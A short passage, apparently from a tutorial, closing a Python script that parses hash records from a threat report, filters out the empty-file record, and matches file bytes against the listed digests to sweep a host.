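    return [r for r in records if not is_empty_file_record(r)]


if __name__ == "__main__":
    recs = parse_report(REPORT_EXCERPT)
    print(f"{len(recs)} records parsed, {len(actionable_records(recs))} actionable")
    print("empty input matches record(s):", match_bytes(b"", recs))
```

To sweep a host, read each candidate file's bytes and pass them to `match_bytes` against `actionable_records(parse_report(...))`; a hit is then backed by every digest the report listed for that file, and the zero-length record can never fire.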